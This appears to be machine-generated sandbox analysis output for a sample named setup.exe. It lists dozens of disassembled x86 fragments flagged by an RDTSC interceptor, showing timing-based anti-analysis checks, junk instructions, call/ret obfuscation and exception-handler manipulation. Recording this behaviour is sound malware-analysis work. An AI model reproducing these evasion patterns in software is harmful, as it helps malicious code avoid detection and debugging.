Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97498B second address: 97499D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007FBA24820DA0h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97499D second address: 9749CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FBA2516CD48h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D2B70h] 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9749CD second address: 9749DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA24820D9Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 974EB6 second address: 974EBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 974EBA second address: 974EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 974EC6 second address: 974F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007FBA2516CD58h 0x0000000b popad 0x0000000c nop 0x0000000d pushad 0x0000000e movzx esi, si 0x00000011 or eax, dword ptr [ebp+122D561Fh] 0x00000017 popad 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c sbb esi, 08A5F7D0h 0x00000022 push eax 0x00000023 pushad 0x00000024 push edi 0x00000025 push esi 0x00000026 pop esi 0x00000027 pop edi 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 976938 second address: 976957 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9760C6 second address: 9760CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9760CC second address: 9760D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9760D1 second address: 9760F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9773C1 second address: 9773CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97944F second address: 979455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 979455 second address: 9794BA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d movsx esi, ax 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FBA24820D98h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007FBA24820D98h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov si, di 0x0000004b ja 00007FBA24820D96h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9794BA second address: 9794C4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97A041 second address: 97A046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97E710 second address: 97E722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jnp 00007FBA2516CD46h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97914B second address: 97914F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97914F second address: 97915E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 979DF5 second address: 979DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 979DF9 second address: 979E07 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 979E07 second address: 979E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 98180A second address: 98180F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9827E0 second address: 9827F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA24820DA4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9827F8 second address: 982828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2388h], edi 0x00000011 push 00000000h 0x00000013 add bx, 57CBh 0x00000018 xor ebx, dword ptr [ebp+122D2964h] 0x0000001e push 00000000h 0x00000020 jnp 00007FBA2516CD49h 0x00000026 xchg eax, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 982828 second address: 98282C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 98282C second address: 982830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 982830 second address: 982836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97E90F second address: 97E934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBA2516CD51h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 982836 second address: 982845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA24820D9Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97E934 second address: 97E93B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 982845 second address: 982853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 982853 second address: 982857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 982857 second address: 982861 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97E93B second address: 97E9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, 3ACC8044h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007FBA2516CD48h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e sub dword ptr [ebp+122D3785h], eax 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b pushad 0x0000003c mov esi, dword ptr [ebp+122D1E23h] 0x00000042 cmc 0x00000043 popad 0x00000044 mov eax, dword ptr [ebp+122D0FD9h] 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d call 00007FBA2516CD48h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 jnl 00007FBA2516CD4Eh 0x0000006a push FFFFFFFFh 0x0000006c mov edi, dword ptr [ebp+1246E7C2h] 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007FBA2516CD4Fh 0x0000007a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97E9D0 second address: 97E9D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 980988 second address: 980992 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FBA2516CD4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 980992 second address: 980A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e je 00007FBA24820D9Ch 0x00000014 jnl 00007FBA24820D96h 0x0000001a sbb ebx, 1B4BFD3Ah 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007FBA24820D98h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 mov eax, dword ptr [ebp+122D0421h] 0x00000047 jne 00007FBA24820D9Ch 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007FBA24820D98h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 00000018h 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 xor ebx, 3F829395h 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FBA24820D9Fh 0x00000077 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 986DB0 second address: 986DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA2516CD55h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 986DC9 second address: 986DDB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 986DDB second address: 986DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 986DE2 second address: 986E5D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA24820D98h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+12449762h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FBA24820D98h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f push edx 0x00000030 or edi, 25FA20FFh 0x00000036 pop ebx 0x00000037 push 00000000h 0x00000039 jmp 00007FBA24820D9Ch 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jmp 00007FBA24820DA1h 0x00000047 jmp 00007FBA24820DA7h 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 986E5D second address: 986E64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 986E64 second address: 986E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 986E71 second address: 986E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 986E76 second address: 986E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 987E32 second address: 987E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FBA2516CD4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9818FB second address: 981902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9839EB second address: 9839F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9839F1 second address: 983A21 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBA24820DA5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA24820DA4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 983A21 second address: 983A26 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 98E5CF second address: 98E5E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9905FA second address: 9905FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 99822D second address: 998254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBA24820DA6h 0x00000009 jmp 00007FBA24820D9Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 997DAF second address: 997DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 99D700 second address: 99D704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 99D704 second address: 99D747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FBA2516CD54h 0x0000000d push ebx 0x0000000e jnp 00007FBA2516CD46h 0x00000014 pop ebx 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007FBA2516CD52h 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 pushad 0x00000025 popad 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 98A77C second address: 98A79B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBA24820D9Ch 0x00000008 jc 00007FBA24820D96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FBA24820D9Ch 0x00000019 jnc 00007FBA24820D96h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 98B744 second address: 98B74A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 98B7F3 second address: 98B810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA24820DA8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 98C762 second address: 98C766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 98E886 second address: 98E88A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 99D860 second address: 99D865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 99D865 second address: 99D8AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA24820DA3h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007FBA24820DA0h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBA24820DA7h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 99D8AF second address: 7CEA92 instructions: 0x00000000 rdtsc 0x00000002 je 00007FBA2516CD48h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e add cx, A55Fh 0x00000013 popad 0x00000014 push dword ptr [ebp+122D1685h] 0x0000001a jns 00007FBA2516CD49h 0x00000020 pushad 0x00000021 cld 0x00000022 popad 0x00000023 call dword ptr [ebp+122D389Ah] 0x00000029 pushad 0x0000002a jns 00007FBA2516CD5Dh 0x00000030 pushad 0x00000031 jmp 00007FBA2516CD55h 0x00000036 popad 0x00000037 xor eax, eax 0x00000039 add dword ptr [ebp+122D1A4Ch], ecx 0x0000003f mov edx, dword ptr [esp+28h] 0x00000043 pushad 0x00000044 mov dword ptr [ebp+122D1EFAh], edi 0x0000004a popad 0x0000004b mov dword ptr [ebp+122D29CCh], eax 0x00000051 js 00007FBA2516CD52h 0x00000057 sub dword ptr [ebp+122D1F2Ch], ecx 0x0000005d mov esi, 0000003Ch 0x00000062 cld 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 mov dword ptr [ebp+122D1A4Ch], esi 0x0000006d lodsw 0x0000006f jmp 00007FBA2516CD58h 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 clc 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d stc 0x0000007e push eax 0x0000007f push esi 0x00000080 push eax 0x00000081 push edx 0x00000082 pushad 0x00000083 popad 0x00000084 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 98F66B second address: 98F685 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820D9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jns 00007FBA24820D9Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 99080F second address: 990834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA2516CD4Ch 0x00000009 popad 0x0000000a jg 00007FBA2516CD48h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 ja 00007FBA2516CD46h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 990834 second address: 99083E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA24820D96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A3176 second address: 9A3187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBA2516CD46h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A3187 second address: 9A318B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A29F7 second address: 9A29FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A29FC second address: 9A2A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A2A02 second address: 9A2A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A2A08 second address: 9A2A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A2B62 second address: 9A2B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBA2516CD51h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A2B86 second address: 9A2B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FBA24820D96h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A2B9A second address: 9A2BAE instructions: 0x00000000 rdtsc 0x00000002 je 00007FBA2516CD46h 0x00000008 js 00007FBA2516CD46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A2BAE second address: 9A2BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A2BB2 second address: 9A2BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A2BB8 second address: 9A2BC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FBA24820D96h 0x00000009 jbe 00007FBA24820D96h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A3009 second address: 9A300D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A300D second address: 9A3016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9A3016 second address: 9A301B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
